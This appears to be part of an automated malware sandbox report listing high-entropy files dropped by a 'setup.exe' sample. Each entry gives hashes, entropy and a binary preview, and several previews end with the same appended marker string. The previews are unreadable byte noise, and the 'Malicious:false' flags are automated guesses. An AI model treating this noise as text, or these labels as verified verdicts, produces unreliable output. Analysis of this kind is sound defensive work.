              Preview:<?xml.....%.+..`N....V..+..L.p/].........8/[.I;&9#.$-[.~]t..r.+B....j7J.Mw.e.P-6..9y.^.....@...*h#h......1d.. j'I..%...r.....2.{.7.(...+.|c)..$......N...E..E...@H..c.."..4.....g..*.....f%.|.E}|=....O. .)G&.5)..]V.% p<k.....3I.XX..*4...T.6...<g1.@.8....n0[.q.r8W......5.#.g.WQC.cO....O...5AuH...,...t..k.....#...V.8O........2.\t...e.......*...c...i...I7..f].{.....<B.K.#.X..w'....;.NjO.!f-.F3..W...l(S....nr....q......VF44.Z*.j...6.P\....L-.dL.`u..7..W]Y*..........."...3...y.].$.,...j.K!...~.rd.Q.^...=.t.O..D....k|.........F....R..O......<.?J._Aw.Yj........F.3..KD.u<....S...@6..).H......Nr.......S;.TZ...p.-..!.}.(....#..p..hh.:D.\..=.9..N.lo.$^.:0......{...[....j..R.5.. ..q...W..Q~.U|Q...Ijw9*Z..+...M.P...=....=...=...8...(....}\....Pz............wN..O...e.G...r{.u<.J@a..3R...[..;N\........}I..........\....Em..r.<.L.%..X,.......q...2.s.....Y#...eb&K]H.r:I3..|..@0.V.Z..b..6....E*.~..!...!XHU..se2[..D..r..fn.YB.g"....V9F.......kJ7..O..q....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1192
              Entropy (8bit):7.816087712076252
              Encrypted:false
              SSDEEP:24:19NvTgM7K0ZvwkJ9AQ9gzF/US8s70AE1LF4mrDIJpfbD:ZvUM7KIJ9gdUSD4KcDIJpDD
              MD5:624931453174B2FADB9D5AD233E5CF38
              SHA1:E2890F2B959F9C41B1324A75FA4DC9B08F840A3F
              SHA-256:D6E4E3B4F0349E9316DB4EB297438E5676B0962364FAD826F438D2253A7D17D6
              SHA-512:7A341AF60BCAD800A0859FB6ACFF5F31DF6ADB2132B28E0A1E054582BDA366CCAA4F4A9D8891DEBAD4806AB6F4BCAB2E3C78B523705687D13714DBA6D84E1BAD
              Malicious:false
              Preview:<?xmlp.DF6/..g#.._y...V...UT./.Y....D.V-.Y..B@..-.Z.....x[.$...A.F.m. 7y...H...L..qm.OoI.X..&R.E..K...D6...y.z.Bd/....2j8v.Gud..k..Q..@}..t*.Wk.(.t..Q]......h.....).....O.y.-a.}U,:..Q...!.U..b...M..l.<,d...K0.]uw..H.'......t.$[......;;*6..j\!a.dg.....,H.b(..D..,...!.q.....W.X..N.l....#.|..6k.9....1..{.80......gs...u.zB..P..[..........NjHa}0....}L....i... ;.......A.6.\...=[/...5....>.q....\X..A.>VC.@.t.:.......g.w.]. ...l...>....-.....|}.P...GA.Lu...8.F.%.{.V....'y.q*....7+d..|..T6..gS....Lpt.........C......iIk.".........P .3.|YLMTW...X......1....S.z.*,.J..U../..0?........Qe..*Q4T.J...8..P....C.{.=/1Q.).h........Z.?.1...k.i.p...}.....2m.....u.1>W<O(Na..."m.wC.L.(.h}..W..>....v.&N...!n.s*...Z6../u...~W/.7yH.....3+#..j.._$.)~.n)=.U.#B.fmv.x[UT.....X>^.......X..5R.....h....0?e...0K.1h.....`..z..../.....`.|..!.....|....z.T...TvY..5..'..g.8....'.8M..{.z0..#...Xb...wGx..W8,:..S...X..PFs368.Wl..(R...3....7~../..Jfd..z3%.%.\.'M..8....-...{.!v8$..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):7.783444302237403
              Encrypted:false
              SSDEEP:24:yihRY9j1O5Dw5ysNvBXdhrMquvW7VjllWtGYXel3WbD:ve1O6jJHIq1KEYXeyD
              MD5:DA0E7A97EDF69E103C68E7BBFAF752DC
              SHA1:94C0C04A9871CD134E1C3606280375388031F0FE
              SHA-256:75ED146BB5B4A7FB146B5607D031D4A8C12F3EDB95C9FDD0E50813EDC6114AC0
              SHA-512:17E4F02FEBA02928016A4FEF28DC576E65F68AD263D00828E0A0846332C5C50BBFE049598C1B3B25984F6A94499BA0631DA170A49902F2EAEAD7E73B02D1CED7
              Malicious:false
              Preview:<?xml`..:.T.,....M...h...7....9..(.">j....s.J.y>.D.Y..G".'.S.E..( .....G..)....tS.._6.T...s...+.......K{B.-.x2...z.KN...@....O.!.yC.&..._.\...(....=`.....{Y..............O?J]...n....(...c....j.|.....XX..."..D*.. .........j.......%..lS.J.0........N...._$i.x2\l..../.6{.u]n$}..]..&.t....P.+.f......._..........6.l.4.L.{.?.=.'.T$L..._.m.&.#.k{.0jiU.W.....w........>.!.X......E.5...T{..Z...8k)..'.t.4P.9.^.......T\>.80..._..Y......d...#.}...{*.h.p&........$c...^3G.W.......`....-.~_c..Xj...Wu.!......W.V^.........!?-..3..6..".]0...+....eS)....~...t|......E!$.!..O.X.2..5...Dl!.t...L3.EfA..L.../.)n.`|Xu.......<O.#.v) ....\.!.......5;...D.g...|t....H..!..m.....+1.A.t[!.'m...g.)..O..z.uG......R...h5..".<...^0.(:..b..e=..V..?..t...l._......K.._.=...~.OT..g.I.....#..L..nb<.k...!..y..2B.g..........P..fT.A.2...v..../%.y?..p.t..!..x...sI.a....\..qcb.V..K..f3....9J.-k;/+..z..Hs.,.F.w2...,#.C...6n...px......x.3.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3884
              Entropy (8bit):7.950642174113574
              Encrypted:false
              SSDEEP:96:Sqj0FjcP8oMzsxcugviWktN2q42D87OTx:BUcUoMz2gviWktQ32DvTx
              MD5:306763FC7C3F2BF766C07AF3D33CAB8D
              SHA1:BC6CC73EC264CEC1ED492B33EB0AF0D47009568F
              SHA-256:5E01E34859A0B432776921A2CBA680EC4996F59DEEC545183BCCB3668B3D9FB8
              SHA-512:E7D8627A1EF2F444195F76A2C4AF4FB4E77397D3FDF796626621C922E94DFC3531CD65FDC004619003F8E9BE46AEBF576C51830B05C1B1E27F9A77FB087DA1AC
              Malicious:false
              Preview:<?xmlV.\...o...u..r..xP..U..m...g..]..G.DX.$,z..c....8.~.....*}Y..n S8E.R..4..x.Rh.Lo3....,5E.H.@{.X..........^Q...X.S......`.2.=x0}....8Kb...3{.$Z..wZi.b.......B..2F2G...V`N..|&;. .R..GW.U.. B.../]'......HV:8..'...`".../....A...#6...g..@...l......{..g..!.......oS..S..0.#]g.$...6Q..7k..W....d.Rl...9......Mw.d...D...n.T<........F....8l!.D...UD.....*......'.g...D5%..o..D.....3!..oR9.?9p?d.(.P..............I......"..o.VJ*...).....-t.O...o.e..gf./........D.!RoZ.......AMr..].O..........E.F \..:...M..B......W.W..^....8..xQ.....[P9.vx..5....f.@...U.X..{_.......f.'.F..$...tj&W.Z...%.eJN........^!..(......`.`$9VbK.u..~ztr..~.IT.&...c..h....i;....`...Y..REoM..4..1%...$..[9.j`3..g.......@.`.Ba.\QcOW..p._.(.a^......j.`... .........gg.....>..LJ4.E.G..'.IP..*6gK...Q..bs..;..H....i..D.# .=.6:f..B.6.......q.:.9....!w.wKX...u..1.]...I..jiZ.>.z.?._r.I.~'..I0.c^&y..<.....jT.UzA...55-./. [z.?.K.t..X....QHQ....O.+...;..t...TV~.Wg.U...7.A.K.4...h...,..K[.BS.;?n.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):790
              Entropy (8bit):7.666181480071418
              Encrypted:false
              SSDEEP:12:0rbP8rhljrXLLKhlohboPrUgot+3Ui1UhFIC9X+HHmYKpJ3JtPRas39rwvsMR2cq:0XPGLjrqohmUgog1s1X+nOTZyurfbD
              MD5:4ED5BF50894CB803C873E4F0BFE31A07
              SHA1:8980EF87BE3E5AC307E3B82B68258B8753F27769
              SHA-256:BE262E53716CAD6142D3D9FEBC0E2C09552B9A5C7DDE9FC2B6B5CA7374A1B0F7
              SHA-512:23203431C6CC9E12139BDB7E363FEC0D701C0B46344D5651CA3F7A92A7D74C80BC96020954484932948770378A187012D2B43183FFE81A454D75268C953F4347
              Malicious:false
              Preview:<?xmlKi-.)T.O.......$..?8o.l.'..%....n......=u..T......21*0....1.7`....x..b.Y..]..s../.M....b...;..$...........=c+.C......8...8..]8...D*.M5....W..F...N.........|-.....6.$...2..m...S...lY...V....a42+...:..D.d.0..-'+}...N..z8.b05F.*. .U"%.iw....HA.D..igv..:.L1+t. .o.l....I.u'.o.~C...1+.Y.$..p..;.tJ....Y......!..*P=..w...q|..b....yv....7.1...D.c#l...q!V.....<....b....(.wPNZf...#...]`.ns..B.48W..j......%..._c.>...W....%k..)>..^2.."'K....p.t.`...B.c...m.Y.yC.........T..k...4g%.`q...../.p.*..r.........'...`j...TFhj..B.+..C..].K......6.."B|.F_'l$......f"j.8........m.p.V..;.DO.L......../*...+...*'.8...`w..Y.F.}AM....N..Q..j`.2... .HsmU.y..,..@.1.kSo....K.5!.<.....j...zWlu3^..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3934
              Entropy (8bit):7.960973529412821
              Encrypted:false
              SSDEEP:96:ZQOQrPNACbKVSoDSolncGtdNfibUDpoBZ1OZ9ukDZ:ZQOQrPNA4KAoDvlncGPNfiwaZBkDZ
              MD5:EEEB78E3720C1A84205C6C3ACD7AAD89
              SHA1:6483476B2B6227948CA892E361CA93242156D26E
              SHA-256:E8010F92639F06AFB5C4FC0A2511DF6A608090673FC58612A251EF4E4982091C
              SHA-512:22BA63E6D57C08EC577DBB9168234794E5D14C5966C0B04B26D3F599E4D3BF9FD580F5661106535428FCCBA7CFC4B1794716A1ABCC6952D3343D191FA398BF29
              Malicious:false
              Preview:<?xml.........'L..f...}...o...mb.xu.k.....k~2&.b.T.l..p..N.r.{D.Z.3.j.2. .$J.y]...n......C.0..V...z.8u.*0..K....Jy..2...yKTTI...=9$........5.....`.-...5.j..H......*...[m.^.U..dP.g.{9..Rm......*........=.*.....kJ..+..p...t...'...F.yE.iF5.:^(...FpL_u.K.h...m..s.qF...J...<..v4P,t.b...-|^3.1....?....._4....c;.DP...c3{.S..|.R.t..o0..r..&.O....|.?...%..B.h.,Z....X..............)...:L>....q3.Y...<)-2..x.nx.7l&B.W.s|.1._Q.f.Q..j...l[.E...E.T..HG.:uZqx.".....|......%..3....)w=.n.b.mh4.)O...@jDc_vu...{..4@......P.....;of~.o..9.7.M.+...U..Z&....2.k.V..h/.......E...C...]....L.Q........|.[.T@...~...f.....F.3.c.....I:....:.AS..x...|.....{UJ../zW...8.*e..F...M=...5.).(.DzS4..!.....E.R..d._.#.}U%..G....$5w..)..~N.....6..4[.9m...y..;Q"..8......:".-....J....@(..>.U.nt,..d.H,Y..j........Q..s.......,.G.`..p.F..-...S`......>........b..1y$...B.....ZJD.6.Y...R.2..F.z2@e...h=/..!.s0..<.k.^.........F.....iw..0.B.*.f.x....=t.0.d..l-.].......NBq .kV
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1148
              Entropy (8bit):7.832492299141836
              Encrypted:false
              SSDEEP:24:5N3/KSkR8iQb7y4d88PmmVtTXHyKQhN6m7Bg67baRhZ3HpbD:5N3/o8iKf68PmChHyJN6R67bGP3JD
              MD5:A70B648F4AA515768A84BB517323DEAC
              SHA1:25992E715259E2F14F4C4EA2B481A109B555A311
              SHA-256:66CD11D1A71A3FA5FC2592D8ED25C4E4B495640E490145B52FE8DADFC3745153
              SHA-512:C3A08D737655C812A697B01C0EA6637BF03B5DC680C88D56500DBD91DB1435C735F61CFD8524D7CC30785CD0F89CE344E4E0D0706B745185D033A6EE44FAA2B3
              Malicious:false
              Preview:<?xml..K........F......'..D.t.Z.]_.0.pB$;....ST.R..".9f.5#..R..;..S.COj.....e.5.)z.2.J.Y!N.?;[T%..,6./,..qA.....+92.[l...(j..7..S1`U.!...3r......vC#g....O.........n...M@i....J'g..g.....\.....-D...._|....Q....{.......<.O.....o4..&.B....?VH. .f.....\3........$...p.....^@.r.Q..\._.q.n....e..o.....a..OL./...Oo..._.b~...h..sD..~..X..8...e....7O.^NL .s.....K.....k...<> Y..|A.n.6.sH........7.d...O../.......Sr...}..8).Qif.ji...d.z.*.w...r..RFFYY..&..?.'...|.[v..8..V...{....L.yX.(..../..8..Q(..e.....O`..k....;...)....a[........PY*6..tg..6..Sh4pA#...s~.. .)....)..Z.z........h.i.....6..}..]sR.....,...7!H._=....4F. ..D.d.0..3..}M...g..C.....=..I.$J..D..i.'..a.k,..8kW.....E4.`.WN5..........L(......o.S..2......?...[4.Q$......E.t..6..r...vl:].x......9".Z'..q.d.......V....1C3...X5../.4.Jv..:K.s+.....]N{xN....?Je.k{.lV...P.s_.N..W........7.......Th...>.%...1G...O...WF.h.....9.|n....h|L..X;......%K.N.n...2P..n.o..^.nOb.j..}...?.<.4.St....@.......*.o...1dn...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1782
              Entropy (8bit):7.897193028439021
              Encrypted:false
              SSDEEP:48:/wIVm2DDnemuF+AGTigIBZaoRxdQ5mpqxJDoD:/wB2XnfujGOgxrops6
              MD5:5BBF451586C0812F11130EC2C0CC6BC5
              SHA1:5ACDE41FCF5D34EEDA11439C2959A050B9B9A84B
              SHA-256:B9784A632E3F555BCACD9DCC4B5EC2FBA394BD30CE68C1D170568916E60B3C8F
              SHA-512:C313AA37AD44B40C1E2C60DA807AD6FA16A1C755F3B65F13B1879585DF873DE35A7B9068B6E4E7F7E71BD62D4649D2E551266B5B0A947C83034151998517698E
              Malicious:false
              Preview:<?xmlh....''S...Ikt.i:.cW.yXN.Np.9.(..#.W....Bs..j eB...w.A.....`.<>.p.......J.BN...S5f`p.m..`..%/.+y....Fwr.....}.Q...l.........*...U.Y..~..xB..u..F.....R.N.........8En..>.......8.....8.I..,....).....=...*yr.9'..A3l.....z...?Y.|..Z....Od.;.e.G...US..g...{..?..{n. .....u.A.).B.....h...b..~....Z7D..rH98.....V..i.s*.......,........%.j.2....C....YE.'.+Z..;$.L...[..&t7._...)Mn!.m./z.I. 1..d,.B....I....T..S.."....:y....|.......@..:.....I=Bs.Q$#.....T.....8jDVH......Z;'...V-/:.`^...Q.!.F...XA.Dn3(...JQN~..)P.}%...Hf."...#c}'..4)Y.g.B......|..Q.EH...k...6.:E.z..L..O.D.6.....6...|-.wS..=W^v'Q...p.*;.X.7(R.....?..q.....l..../....`.V..8.~........X.NC.X.7.......Z.....9.G.0txwX.{....y0...?....".2..N.3...&......W..L.....S.l._(..J....f.J..on..C.....^..5.F..YMz...=..oJ.1.0..1....G..8..f..S..........j$..V.Nn..b.......|O......x}..6.aje0u.. K <....x+.2.8.y.@..Q.;..).10.....|...Hz.{.|c_ .f^a.>..yA8..B....5z......H...PF..1%(....t@dL.9...l.p..L..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):791
              Entropy (8bit):7.791076185019106
              Encrypted:false
              SSDEEP:24:AH4U3UsSQtlEpMMHOm22+b4EHKjBaoN1oyiLbD:AH4U3appNHQzqEojoyivD
              MD5:D96CF39AEB862EB8353A9D0B1CCB613C
              SHA1:C6ED073248F4F2E621C8B536D415114B1ABDC9C9
              SHA-256:4E4F0A52711970790B0C031449827DA44FB08F1FDF885913F3CBDB813A0CFAFA
              SHA-512:6DA7819781146687FFC6AFEC9F5593B4E8EDE480CD26D9C264F12EDBC6C5F1C5A26AADF772E4A8D1A5FD4C4D8F3C08DCF047EAA191543D5DE9763D8B975F98E8
              Malicious:false
              Preview:<?xml}c.*.../\.iN3.u8..j!.....?G.....~..]...K.>..k...t.i.Pzw.f..H^..2d..._.(......|...&.Wu".Y..M:r....;.>.l......%..'&l....@.#.Q...}......8.F.(.?.^.....u..R...ZZ.4...]=g.1.Xc.*._...5..\.F.T...B(U...>9...%.Ui............_.c=.....i.u..m.tk.U^...T.dRY.f.X...Q...$.#._...a..zk..>g..x......\..;..._*..,.8....p!..C.sx.w....;..D.o.....{+%.....:...k...83.O..#.n.....N..e.p[...X.W..Oxefg.GS..kuYm......Z(.....A...C.8.....R..X.....<..O..........p.X.{qn..h..a....I....<.Z6...q..b...+(v..#...z.w.Q&Z..~>.V.....G...f.V...<. .../d...`.F..Lvk..........3.....6.,6.I0...R..w..S..z,........Vv.....d..m...&.}O.M=.........By.:..&...x@.......y... j../N*..........=......|]8.Q.G.g.....c...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1082
              Entropy (8bit):7.819020918663484
              Encrypted:false
              SSDEEP:24:6cfaLgjtk5zvItUQJVLHfdhnnpubBXO1+wv2j/bpYbD:6cySyvsUQJpHfjnp0s+wv2JCD
              MD5:0BBE87A098F88761303314F71B6BBBC2
              SHA1:EDD7D45885180EF690973F9E9172A5ECC0A78A17
              SHA-256:C29FB3AF0F62605C433077D10CF2797BC8C5B4F457BDC25222E2932DB8B00E02
              SHA-512:87992A4B0F00FE0DDA219D5F19FD25F953796825CD8C4DBEA5D60BC9BC7793FDEBFE134C83E1958AF8C890875DD2D523976A7A1CB395287E15F556493B4B7B83
              Malicious:false
              Preview:<?xml.$?...y38E....*.m.....2n...... >.V..nK..hA3R`....F......&.{..).......@.....j.......z/...m.....5.P..8.i....V..80..-........t.a.A.......A..`7....(y.........._.5..]...-.X}P....;......f......zH....`2|.b.A.t..:..e...I.a.p..z&..{;m..X.D....H.UY).y...F.X ...Zc..1._..w.+|.y...Sj......q.i..&=..)..N....b....C.#...[.@h.tU...........j..^...x a..m....,..R...C.3..p....1...gI.,\........3.._..n.C......sv<6..y.-.#>..l?.n.../]Y.U.....<...R......;.}A.j.Z*..9p.|/....)..#p/&.[...E.^\....6#...T...5.r......|..`Q...q....d..Qp.4.}.w..(pMI..nv....'..KG.Oy.u.sW. ........5.!.x....'r.c....j...[.zl(j..w..U..!8......wU..<.@-..A._......i.^S.d. f...)...t|E..!>s.P.!....l9.....}.L{..E.6......c.lT..JX{~_..+w..!...zg../.c.!..6...;C...#7....V6..)..{..^.j....G.~XC..Sij.B...J.|!..l..oW..a...ie2/..EC3..D.Y.....:.+}...3...H...L.W.hr.}...\J.*|".b.|Ai..C\X...F......]...Sb.B...a..Vx.0..^]5A......-.b!(...Iuh ...#.M=......#,....YYP.N............K.7..mC.D....O...`...k~..(..!..OX....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1061
              Entropy (8bit):7.821026179285563
              Encrypted:false
              SSDEEP:24:Qyjdp2IRSxAoM6xc6UqcYK89H7nV5j07LhexNZ8shVAt7bD:QyvdcAoM6K6UqRH7jCLIH3QND
              MD5:86C8CB659FA9EC794ADC98336BD21054
              SHA1:7095F5E1CDD9031F6F6D260C3A4C9A35B641D439
              SHA-256:A523889BA030680928BE35054D785C34F7C385CF573AD265FED23A2023E2F8C6
              SHA-512:2BEBE3740F0518E0762CF369A0B770122280E91333AFB1DDAE6B6261DCBCB14454351A5ED7479E9485371E5442F491D248E526A0D9B975BCCDB5F601A3DBA266
              Malicious:false
              Preview:<?xml-<,WW...Zc.<.&`......q.(.Ht&.. 6...;.q...CK..3..l.....I.C.!q.g..p...u(%.d.......0.......s..%7.......Y0.:B.6.\........^-J.]`o.&]."....g.........6F.....w..F..4..S...ED.U./Q.gh.R.C..w..n......9.r...$SH...O..8t1.<..$!.....=s*...+....c....3.....a....5.E..6..A.O...G.!......p`\.N..%h.E#...8. .-..c..P......+H...~,.v...)..u..".f.Y.O..P.9D].|.8......]..@e.....oH..y.b6...&ww...h.. ....../...P...%d.g...`.........\h..H......D.N..v.,L.B...t..|..............@...............e";zJ.b.`:..9..,yE)\......^I..=^.w{....J..q.u..3..pf/........>IM.t."i..C.q.v.m$.B.\n..G....J.J%.j...<.a.9n$.b....d.......l.GD]R.|...L.-....Y...n.Cm.....`.I..p......%.(.e@....1..#.e....w/.\.[..:.}..4P..1Z...I?..i.>}j.......*.a.~.-...oz...S...G..iQ..).G.4.0nQ.Qo%..\9..P.%G'..26.H$.k.....5.9 ..8..5L.y.-.;....t.G..Zv....iE2U.q^B.vBP..$.P..Q.Vl|x..z..&..<.%...]2.e..m....z.o......O3 ..].q....~.(Ne...R...4<N.....o`....[...$.=...2..F.L..K.9.eL.@........'.{.X...VrBq0iLIRHjQLgVRL
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.736600356299697
              Encrypted:false
              SSDEEP:24:krcl05jZF/S80Sji053tct+IYL36fkEK/YbD:krcl6L/SdSecdcU336JKKD
              MD5:861F855D1301641C8D6939B4272F3A20
              SHA1:5A89A77773637EBA4E60FBD8D2BA0D6BFE2ECBDF
              SHA-256:FF5C8153B62C57C4D487F054AA98AD75311663701107DE1513DA6DAD4B78B86C
              SHA-512:7ECF92D7CE5A76F558256F0F6BEBC24426D4987847D5457A60EDD5143FA11219C9A5F993DC3A82EDE8CA588D68E53BE70C3ADE54B5E4351D07EF5CFE22765DDE
              Malicious:false
              Preview:<?xmlT)b[Bz..b...<.[..)D..I..L.J.j`....er.6....6.QV....QSj..8t.gA.....nxq.......g.`_.'.XB..RW.M.;.@.......9.F......%.@8MQ...\..c..Q_p......5...P........F.>c5.d..D.G...!...._.b..)..F......=b..m......`zq.....|.H...#Z..P)....#..t...o...5..Y...9;..|u.6...(.^,....+..5...D~......4..g.c....KI}........1.D}.Uh..w/@....]...U...k...]....p.z... !...PP.....K...@.=.9b..#......(4.....5...DFR..L!U.e.O..;%f...?..3.. +..T..\~9..M......;Y.?N. |...i..9/.T..i....F.....u-{..A...b...y.........[.........j."..=.NA?S?.;Z..K..:_....2?3@...$.C...4.w.\..S....I.....a....<.....=.. .XI.(........T6T.a.../..../.H...6.Rj....Kk.....%.*vQHG/5...]o5$.w.=...V........[....).d.W|..v..H..B...h..We..{@Z...V.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1485
              Entropy (8bit):7.8549799100897
              Encrypted:false
              SSDEEP:24:L0MhefSU4vtjLS9G7/O0dPWpNyH2wtRqonrdDGoOa3dGLelM993dXgbD:Of8vtj+gWYPWpNGtRqoBAelMHdqD
              MD5:A5507E15F3EC606BD1BD6A7679A662B8
              SHA1:09399464B9A7BBC280DB827EFC972969F2D3DB99
              SHA-256:691091716B9B4362A8DCF31AD9677447349542D4B345F02693EE7920A8DD9F73
              SHA-512:7C3B6F683E0556AEA33D2C688937D7364946150F34FADBA90A97080D2918E5C5F962FBC9E3E76054AF9D0688C364E5431E89163BDCEF32F57393ADAB7B288013
              Malicious:false
              Preview:<?xml..Pk...R..T..q;............J.s7ag$u.....S{..d\/u.........s_hJ[.S3.'U[R.6(&{|..7:...M....8LAB...v.n:>W^....... H.v'....}...../...2sK..Q.k.+...p.O.o..5...v......P.,..G.f..L.#.;7.l.Q..0;.}.%]..7...J..1&.L.X...R3.!...h.G..c0)..$}[....W.a.9..4YXI.LM..NX...3..h{1..,7.7b.@...pq..`...vP..()2K.Dp.<......U...0...`.*|..S(r..."....V.G|.....4...@1W...3.......M.98B.....%H......"K.x......>...Z..q.}.s.$Q.h.'.#z.iV.B..>..G+A`c....{....p..9.8.qI...j(..j6.s.@...UG4.f..m.4,..$..z...3GN.R4*..(5..<=.+.+.! +.u.A......>.#....I..v..R^........U.6s...d....j...-....m..u<..:v}(.....}q."-!/C.c1%].Ie..........s.|.vS.!*..3..~q.b........*.H]t.1..L...M....+..gR..c...X..Z,U..&.{S...e%..P..Z..U..A.....f......}.......).t=..}....(..I../..c.*...1v.e. ....1...k(...R3..8!m.n..IPK]..It6.p......ia.C..(q.]].....A(|....'X...b.......0........z...f.n..x.O.+g.G.#fAk.....<3......6....ox.`...Q.\......"...bt.!k....O.g....f.h.J....t8..M.@&......@....E.4|...O.V.R7.s'Q.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1340
              Entropy (8bit):7.842285599495138
              Encrypted:false
              SSDEEP:24:YuIDSAkl2tNfZTRytnh2O9caSa7vBmM7M+q2U1L7HbD:xA4OfbyWj+mGeL/D
              MD5:48D995C5D2AA7CB3E62E3D8533747714
              SHA1:01884F2EE73F9918470C7BFC7F1F0E34026786D1
              SHA-256:FD93FC8D8E6194CB6E2F3842536E714B50E18809F5E4D3FFBCE55D5D1816A411
              SHA-512:1EC642F8EE8B4095E7BA45D833937DF88EDE875A28C07359464B5DCD2D64C39C2FD047C72918DFB187BC3D4F816EBBECBA95416BD1816B3CEC85AB07AAB16195
              Malicious:false
              Preview:<?xml%..D-....f.d%nF...p..7...k.2.J7.,....P;....8{e..h0..N...DusNEZ...|.0....n.%.M.N.!...@^.ORPG...'9.'.z.d.g.u.z.~y..u...X..%..=@....M(......o\h.2.......k...WJ..XV2...>6..u&0x[.f..%AA...;f..PE..b..r/.....d&xS..8C......_.N.....4.'xl.IfwT.V.`...Y.y.Nq_...<D..!.].~M.E...MrN..N..@.........t...F%.2".2.1.)...qm....j...EU.....b.Au3c%..(U\XJm............9.......f.l...M...i..;...u..Dx..h....1.....M.T!.....p!E......_.....%..v.c..........p(...>.Y+.R..2L2..Q.....E.""|VN.f....D8~.....N...w....f.F..3.R~..2..X\.^:O......s.y;H.d3....#r....?.Q......fA.w..Q.F..M.D..uk.'.+1{E...v'I..%..Y8.....V.a!47..G..Z.F+96..$.......Md..L5...[..^(...c.+z.7bhr@a....O.:6....c..^..v..PD...RK...N..YTo....Gz...<tV.9.E..-~.~K.)Y......+..v........Y...J._dK.$s..-.....q..q...a....e...0..............Rz...|..I..X.:j.7.....k.}.D.._........>....x6.8....T..a0B...F...h.....-#fy..ZT.D. ..E.....l.`g...F........cl.B..d.4d..A|^.=.Kl.M........(.u..|.} .WC....Z(;.....8_.zz.hy.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1261
              Entropy (8bit):7.836995049287502
              Encrypted:false
              SSDEEP:24:qix2+0YyYub4xLECz0X0cJfIq5QA3C/siPi2PXW01Wr2N9Fu8lDAh/rO+bD:qiwqyYub4xg2o1IqJWVG0BhplDAa8D
              MD5:37B26FF6FF621F7F0BDB5DCDDC7F2A0C
              SHA1:2A3F82AF56091417DEA0060D2AC7D3506264E833
              SHA-256:A0CB15D478FFCDFAF4920D76CF2AC65CF32BAD04889ED7F314377A054BD83C9F
              SHA-512:997F965F99C00C9D6A92007E177340FFEF49385F0F75AEFAF1C102A6C785587D44E47AB8A5B0497C9F0907E6FE5BDAEFE75B8917866064EF5190F9E1BA57AB1F
              Malicious:false
              Preview:<?xml.gjT...[..W].L...j..@.&....A.s..}....:.....d.A.....&f...{......R7i......n._b....)n...q..i....1....B...D..P.X....-L.y...0.B$..am..G.'..Onp..4.....0b..Y...Q>=.x1....BW1..gS..l..7.%.....%gI.g...@.rN.+=+3F.._....V.....,...D.>r}..u...:3Q..@f..T.f..dX.;R..P.f.h.b(.W.3..>.i.......q.i..s..]..Gu...Wq......P...GAc...0j....`..D.x..C.s....G.s7+......K.g...o^.."zF.-...]Y)..v..%.8...6....qB....+...(Hq.0.=.i.6...D...Pf..).[..Z...>.J^....CD.H.j/.Hz..@O....RI.f........c.f......P..7q.........)....OL+..%....S...G_j!......0....6.Z%T..... ...&!..t(...G..]:....~..g_H...7.........CC...b,..s...s...V....q.....n.a.J...C.`...U...C.C.&..R.T.S.y'...V6.....G....Z..aM..N..?>e..CL,.N....p.S.9..L....2...k..S..-.o.b........../r.....<..y..B..|..1.#.;Ik:.b..-R.wEI... ..e3...{...U2.+f:.......a.....b.&..R..?*B....1./L...*.h....J./.u....s......+...!.9.!z.g...8..,.cf..I.q'1.1P.2.....#.U.".h8......._6.*....)=.>T]x...`.I.......b.#rA.. x.......?.\.\.|.~j........G...[...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1268
              Entropy (8bit):7.807746400695417
              Encrypted:false
              SSDEEP:24:AuEpTm99t6Pf58EIMGI9PJFvLxVBL7lZBDKwdcea7ykAyobD:AuOqfgPf58jMGI9PvLxfL7zBWwaeam1z
              MD5:1520703482C3BE098353800C8B3D2BD4
              SHA1:D9A74B737D034E8C2B0A1C6A71C550865FA855C1
              SHA-256:289E97BE7884A5D204E3DD8B31057A2470490844F58DB675C0D2F1677B788912
              SHA-512:E717793B00FAC73E7289008D076BCC26A12D89023524DB063B0763D7F779286C055E53E856B70BF83095CA92F83C6A1BFEB15606A3F4982DB6D901182F1166F1
              Malicious:false
